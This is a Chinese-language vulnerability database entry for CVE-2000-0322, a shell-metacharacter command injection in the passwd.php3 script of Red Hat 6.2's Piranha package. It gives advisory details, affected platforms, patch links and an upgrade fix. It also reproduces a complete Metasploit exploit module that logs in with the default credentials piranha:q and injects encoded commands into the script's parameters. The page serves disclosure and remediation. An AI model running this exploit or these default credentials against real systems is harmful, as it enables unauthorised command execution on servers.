CVE-2000-0322
CVSS10.0
发布时间 :2000-04-24 00:00:00
修订时间 :2016-09-16 21:59:03
NMCOP    

[原文]The passwd.php3 CGI script in the Red Hat Piranha Virtual Server Package allows local users to execute arbitrary commands via shell metacharacters.


[CNNVD]RedHat Piranha软件包中passwd.php3脚本执行任意命令漏洞(CNNVD-200004-071)

        
        RedHat 6.2附带Piranha virtual server软件包中passwd.php3脚本存在一个安全漏洞。
        passwd.php3脚本由于未对输入进行适当的检查,导致任何可以通过Piranha软件包鉴别机制的用户以当前WWW服务器对应之有效用户ID,执行任意命令。这将作为进一步损害系统安全
        性的前奏攻击手段。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/o:redhat:linux:6.2::i386
cpe:/o:redhat:linux:6.2::alpha
cpe:/o:redhat:linux:6.2::sparc

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0322
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0322
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200004-071
(官方数据源) CNNVD

- 其它链接及资源

http://www.redhat.com/support/errata/RHSA-2000-014.html
(UNKNOWN)  REDHAT  RHSA-2000:014
http://www.securityfocus.com/bid/1149
(VENDOR_ADVISORY)  BID  1149
http://www.securityfocus.com/templates/archive.pike?list=1&msg=Enip.BSO.23.0004241601140.28851-100000@www.whitehats.com
(UNKNOWN)  BUGTRAQ  20000424 piranha default password/exploit

- 漏洞信息

RedHat Piranha软件包中passwd.php3脚本执行任意命令漏洞
危急 未知
2000-04-24 00:00:00 2005-05-02 00:00:00
远程  
        
        RedHat 6.2附带Piranha virtual server软件包中passwd.php3脚本存在一个安全漏洞。
        passwd.php3脚本由于未对输入进行适当的检查,导致任何可以通过Piranha软件包鉴别机制的用户以当前WWW服务器对应之有效用户ID,执行任意命令。这将作为进一步损害系统安全
        性的前奏攻击手段。
        

- 公告与补丁

        厂商补丁:
        RedHat
        ------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        RedHat Linux 6.2 sparc:
        Red Hat Inc. RPM 6.2 sparc piranha-gui-0.4.13-1.sparc.rpm
        ftp://updates.redhat.com/6.2/sparc/piranha-gui-0.4.13-1.sparc.rpm
        RedHat Linux 6.2 i386:
        Red Hat Inc. RPM 6.2 i386 piranha-gui-0.4.13-1.i386.rpm
        ftp://updates.redhat.com/6.2/i386/piranha-gui-0.4.13-1.i386.rpm
        RedHat Linux 6.2 alpha:
        Red Hat Inc. RPM 6.2 alpha piranha-gui-0.4.13-1.alpha.rpm
        ftp://updates.redhat.com/6.2/alpha/piranha-gui-0.4.13-1.alpha.rpm

- 漏洞信息 (F86303)

RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution (PacketStormID:F86303)
2010-02-15 00:00:00
patrick  metasploit.com
exploit,web,arbitrary
linux,redhat
CVE-2000-0322,CVE-2000-0248
[点击下载]

This Metasploit module abuses two flaws - a meta-character injection vulnerability in the HTTP management server of RedHat 6.2 systems running the Piranha LVS cluster service and GUI (rpm packages: piranha and piranha-gui). The vulnerability allows an authenticated attacker to execute arbitrary commands as the Apache user account (nobody) within the /piranha/secure/passwd.php3 script. The package installs with a default user and password of piranha:q which was exploited in the wild.

##
# $Id: piranha_passwd_exec.rb 8497 2010-02-14 20:27:24Z patrickw $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution',
			'Description'    => %q{
				This module abuses two flaws - a metacharacter injection vulnerability in the
				HTTP management server of RedHat 6.2 systems running the Piranha
				LVS cluster service and GUI (rpm packages: piranha and piranha-gui).
				The vulnerability allows an authenticated attacker to execute arbitrary
				commands as the Apache user account (nobody) within the
				/piranha/secure/passwd.php3 script. The package installs with a default
				user and password of piranha:q which was exploited in the wild.
			},
			'Author'         => [ 'patrick' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 8497 $',
			'References'     =>
				[
					[ 'CVE', '2000-0322' ],
					[ 'CVE', '2000-0248' ],
					[ 'OSVDB', '1300' ],
					[ 'OSVDB', '289' ],
					[ 'BID', '1149' ],
					[ 'BID', '1148' ],
				],
			'Platform'       => ['unix'],
			'Arch'           => ARCH_CMD,
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'       => 1024,
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic',
							# inetd works, but not on RH6.2 syntax wise. telnet also, but /dev/tcp not found.
							# others use single quotes which apache/bash/htpasswd escapes (\) and breaks. sigh!
						}
				},
			'Targets'        =>
				[
					[ 'Automatic (piranha-gui-0.4.12-1.i386.rpm)', { }]
				],
			'DefaultTarget' => 0))

			register_options(
				[
					Opt::RPORT(80),
					OptString.new('BasicAuthUser', [true, 'The HTTP username to specify for basic authentication', 'piranha']),
					OptString.new('BasicAuthPass', [true, 'The HTTP password to specify for basic authentication', 'q']),
				], self.class)
	end

	def exploit
		cmd = Rex::Text.uri_encode(payload.encoded, 'hex-normal')
		str = "/piranha/secure/passwd.php3?try1=q+;#{cmd}&try2=q+;#{cmd}&passwd=ACCEPT"
		print_status("Sending GET request with encoded command line...")
		res = send_request_raw({
				'uri' => str,
				'method' => 'GET',
				'headers' => {
					'content-type' => 'application/x-www-form-urlencoded',
					},
		}, 3)

		if (res.code == 401)
			print_error("401 Authorization Required! Our BasicAuthUser and BasicAuthPass credentials not accepted!")
		elsif (res.code == 200 and res.body =~ /The passwords you supplied match/)
			print_status("Command successfully executed (according to the server).")
		end

	end

end

    

- 漏洞信息

1300
Red Hat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

2000-04-24 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 0.14.3-1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站